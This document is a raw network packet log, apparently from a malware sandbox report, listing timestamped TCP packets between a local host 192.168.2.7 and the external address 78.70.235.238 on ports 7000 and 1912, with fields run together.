                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.513822079 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.513880014 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.513886929 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.520723104 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.520790100 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.520867109 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.525739908 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.525789022 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.525830984 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.532018900 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.532074928 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.532258987 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.538125992 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.538193941 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.538233042 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.544070005 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.544146061 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.544226885 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.549334049 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.549401045 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.549439907 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.555088043 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.555149078 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.555221081 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.561069965 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.561081886 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.561135054 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.567373037 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.567441940 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.567476034 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.573379040 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.573436022 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.573481083 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.578886032 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.578941107 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.578948021 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.584527016 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.584541082 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.584578037 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.591171026 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.591248035 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.591259956 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.597280025 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.597295046 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.597362995 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.602947950 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.602998018 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.603028059 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.608681917 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.608726025 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.608764887 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.614303112 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.614363909 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.614378929 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.620845079 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.620904922 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.620908022 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.626933098 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.626998901 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.627055883 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.633183956 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.633254051 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.633255959 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.640022993 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.640085936 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.640187979 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.645170927 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.645234108 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.645258904 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.651420116 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.651503086 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.651530027 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.657546043 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:16.657610893 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.225320101 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.280910969 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.320061922 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.439500093 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.439526081 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.439582109 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.439589977 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.439593077 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.439660072 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.439677954 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.439759970 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.558991909 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.960688114 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:19.962388039 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:20.082163095 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:21.835249901 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:21.954792023 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:21.955092907 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:21.966725111 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:22.086148977 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:23.223162889 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:23.261689901 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:23.385294914 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:23.671143055 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:23.812253952 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.234613895 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.278291941 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.397898912 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.397917986 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.398000956 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.398019075 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.398029089 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.398128986 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:24.398139000 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:28.741564035 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:28.861027002 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.159954071 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.159974098 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.159996033 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.160007954 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.160031080 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.160070896 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.243494987 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.274563074 CET498377000192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.351833105 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.351886988 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.352080107 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.394175053 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.394258022 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.394267082 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.394274950 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.394408941 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.394418001 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:29.394500017 CET70004983778.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.850816965 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.970752954 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.970768929 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.970779896 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.970791101 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.970801115 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.970809937 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.970820904 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.970876932 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.971030951 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.971698999 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:30.971796989 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.029093981 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.029256105 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091362953 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091444016 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091458082 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091465950 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091594934 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091603994 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091660976 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091752052 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091767073 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091775894 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091779947 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091834068 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.091887951 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.092343092 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.092449903 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.092508078 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.094090939 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.148850918 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.149040937 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211195946 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211309910 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211370945 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211453915 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211554050 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211564064 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211635113 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211704016 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211730957 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211980104 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.211991072 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212109089 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212268114 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212279081 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212289095 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212347984 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212486982 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212496996 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212502003 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212609053 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212620020 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212694883 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212734938 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212744951 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212757111 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212846041 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212908030 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212918997 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212924004 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.212989092 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.213649035 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.213732004 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.213855982 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.213916063 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.213926077 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.214071035 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.268924952 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.268990040 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.269001961 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.269010067 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.269025087 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.269129038 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331475019 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331515074 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331598997 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331718922 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331729889 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331749916 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331759930 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331804991 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331820965 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331831932 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.331912041 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332047939 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332057953 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332066059 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332077026 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332112074 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332209110 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332218885 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332283974 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332294941 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332408905 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332418919 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332463026 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332473040 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332602978 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332613945 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332648993 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332659006 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332767010 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332777023 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332894087 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332904100 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332912922 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332921982 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332930088 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332988977 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.332998991 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333007097 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333133936 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333143950 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333153963 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333199024 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333209038 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333218098 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333257914 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333414078 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333422899 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333431959 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333440065 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333520889 CET499751912192.168.2.778.70.235.238
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333621979 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333633900 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.333641052 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334388971 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334398985 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334405899 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334837914 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334847927 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334856033 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334872007 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334881067 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334888935 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334897995 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334907055 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334917068 CET19124997578.70.235.238192.168.2.7
                                                                                                                                                                                                                                                      Dec 8, 2024 15:09:31.334932089 CET19124997578.70.235.238192.168.2.7
